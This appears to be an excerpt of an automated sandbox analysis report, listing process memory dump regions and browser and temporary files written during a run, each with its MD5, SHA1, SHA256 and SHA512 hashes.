memory/2992-1497-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1499-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 12ff1370793fefd6d07bd6762f9c04a9 |
| SHA1 | e32b967a3a69022c11af2b15c4e6bd51c3d02267 |
| SHA256 | 1d56ea38ad74dc6928787b677ac2451e1bd4317ed146d936ae656b55e63af9e6 |
| SHA512 | 2495d12211e90c5b9a9fab451a7b59cf419653764c86ab7568348589460d7f6dab1a0f1f7e98e76d3ac8d5cded603f2cf0c256fa2e073f94b1f617bb918067a4 |
memory/2992-1506-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1508-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1510-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1512-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1514-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1516-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1518-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1521-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1524-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1526-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1528-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5e287264d315a8508f585e3d0ba8e4ff |
| SHA1 | e5642402fa98c84c2878cc01dc11d10b6b9264c5 |
| SHA256 | 7b3158b2175c473e5ff7de42e8da6718556e9636a01213e3526a88abf75fead1 |
| SHA512 | f77c9567be521b95f7a8d2f9baf3b4b65d73028858e27e978b76555a687f500e0bc5ffb52ff3494b88f30e6c045fb262a88eb7714aadc64375521251760beb82 |
memory/2992-1539-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/2992-1541-0x000002D6E0D80000-0x000002D6E0E61000-memory.dmp
memory/6344-1596-0x0000000000B10000-0x0000000000C10000-memory.dmp
memory/6344-1598-0x0000000000920000-0x0000000000929000-memory.dmp
memory/6588-1604-0x0000000000400000-0x0000000000409000-memory.dmp
memory/8568-1621-0x0000000002A50000-0x0000000002E49000-memory.dmp
memory/8568-1626-0x0000000002E50000-0x000000000373B000-memory.dmp
memory/8568-1632-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/6360-1775-0x0000000002780000-0x00000000027B6000-memory.dmp
memory/8468-1778-0x00007FFDB3550000-0x00007FFDB4011000-memory.dmp
memory/6360-1783-0x0000000004EC0000-0x00000000054E8000-memory.dmp
memory/6360-1785-0x00000000740D0000-0x0000000074880000-memory.dmp
memory/8468-1788-0x000001FB7CF00000-0x000001FB7CF10000-memory.dmp
memory/6360-1789-0x0000000002860000-0x0000000002870000-memory.dmp
memory/6360-1793-0x0000000004D80000-0x0000000004DA2000-memory.dmp
memory/6360-1795-0x0000000005560000-0x00000000055C6000-memory.dmp
memory/6360-1797-0x00000000056D0000-0x0000000005736000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nlvxbtjo.2wf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/6360-1817-0x0000000005840000-0x0000000005B94000-memory.dmp
memory/6588-1820-0x0000000000400000-0x0000000000409000-memory.dmp
memory/8468-1830-0x00007FFDB3550000-0x00007FFDB4011000-memory.dmp
memory/6360-1849-0x0000000005D60000-0x0000000005D7E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 6b06957dbe466b83b3383ab5ea64c4e6 |
| SHA1 | 5bac2571da7eb28e41e66178b7355b86fe890f7b |
| SHA256 | 387e93ebc5d2d454b985ebd8db7d5dd7b2ed665485d0216af406c26151ac5c0b |
| SHA512 | 853a574e3a5c37595832dc73ca440cad844b2f00ab1e0f7723436ab2e7a55b20ff140f417de0b9deaaaf6ca4c871e5d6a11970729f178121cea0e17f6bd1d437 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | af31a29a4d85d26110b774d1cc491fb9 |
| SHA1 | ddfffebb21ba628fc39e53d6fcb2759661623fab |
| SHA256 | 952870157884666704cf1ef42e5b5e8450246aa884151622f18904b1ea24ad08 |
| SHA512 | 27ce9a4aeca24e5588afff95b556a1529b03e04dfd17c0508fdd6d94848cdce3a642c3a22941b6789357390794daed6c1f7e8283bc8d6b47273f109520cdea97 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe597035.TMP
| MD5 | 8336c89bcc219c6bc1a7a2bbc3ae3a5f |
| SHA1 | 143916472a1021de849143b9484ae74bc581335c |
| SHA256 | f6e37365047539898226fab0eeed2b33acffc7af8702a1f2c0694c09a251879f |
| SHA512 | df9c384906c95ddbe4456f6a443616b1e3e54ffba063397a0303224d26321dc6d9e5b991745dced83146573af846af92b3b078cbd0c478abbbf1e5ebb170f858 |
memory/6360-1931-0x0000000006D40000-0x0000000006D84000-memory.dmp
memory/6360-1957-0x0000000002860000-0x0000000002870000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 12a68b9db8681cf404692da89d333345 |
| SHA1 | 5eab732693ea3b199eaee1ac82561d9a12f73bc7 |
| SHA256 | 8859ebcdcc1ef3a9516ebe3d407b6e18583dafb41777a1c98cd5a92ccc55dc48 |
| SHA512 | 21055ff359464cb05634315f45c5e992c0703ba80a5d28bba46e799df8462beb50796d4064981963bf1e8e7047620041145d28ee1842b50c987318a366589a17 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\b679db8b-e7d4-4d5a-9abc-4b56d135d375\index-dir\the-real-index
| MD5 | af539e2f76ac5bfd6ec160a4dce5b64a |
| SHA1 | 074a2d67e2446949574584685e44d0c067dc0e84 |
| SHA256 | 98df1a42d71ba2d024ba25b598c159216da9e68015b209992a3fa454aeccc2e3 |
| SHA512 | b60f3efa9884c1317c43348eb583f7f2900eabe22ca552f0ed6c2203e4a85397f989ee0d7d5da76fafcd5c2fb98baf68b6433bf376218afc427f3833a1c6900b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 87c8a71223977237c8c3cf3b90701e26 |
| SHA1 | 39f2dee42e0ab9ed3949c165d681691dba26c418 |
| SHA256 | bf70f9217672d4ec174f10aa627d9d1977dd23ce03e9e05e8af64a7cd647b3c1 |
| SHA512 | 2ebdd602a57baa688a0c3f745e80fd6235d72047a43d58f0cb6ea018f804daa8f47edb12d60416f01859c3557b96a22f8610adaf11c302ba2a12d00164011fc7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\b679db8b-e7d4-4d5a-9abc-4b56d135d375\index-dir\the-real-index~RFe59c039.TMP
| MD5 | c69d222922c03e56ce23d2b9b0a4fedc |
| SHA1 | af1c99c08b20bc756975c059695e580cebee8bbc |
| SHA256 | 6f56bcdef0e5d40c4bb0e4dfcd6ee40249a51e32435db8c51341b1ff0751831f |
| SHA512 | 496b754caf55ccd08554b33230235e6c004fbadb858e3278b4c1bbe324243e0193c1e1a7e70c83fc5ef396dd5d0d427ab87aafff5c410b61d1c5a6804757be22 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0bb75e023d9af122a24d99186510c720 |
| SHA1 | 34b5cbb299e5e5715c8787db60fab78bf284e678 |
| SHA256 | 92da3b598119a42ddee9d772594236a3e72e865aba16edb30db5ebbd49bf1ed8 |
| SHA512 | 87212ff6fceb984bab24b4b8f5ed4ccdadf2c48e92e2e82e8902e52824b14d47236f8271c9246693dca07b0e9e609a7b567a46645eab3d5aa59a1dcdefecc079 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 55d14620bdbaf7f140b2c2b907c7fa82 |
| SHA1 | a9a7e6834388065c6fa6a1522aad11c000a6a2a4 |
| SHA256 | 409b96dd77f77a19d6fa185f1bd655665d5ea0afc64fe9d14ef799fb3bc0bc8b |
| SHA512 | b4853822e1f4f1be565bbf6a48cf575f73c104412f21b09699b9819d15297a8d7ca4bc2183d55dfa28b508bca65def436dd94c8e804fde07243a8fe03b41db85 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 11ccb834bcde8c5f2900074c73138595 |
| SHA1 | 7df5d9f8791e1abbb196a4976cca197210b578e8 |
| SHA256 | f0223704751ac3f79ef900e873e3798a9224cae9a420faabbca3e862d64390d1 |
| SHA512 | 0992a874a46949b5b36cf1db0c27adb8a507df95c75deea0885d7170ddab7a3760fa43095a62b23238708f3a07ea363c297bbf8c522235b91ddcd52a5879c37f |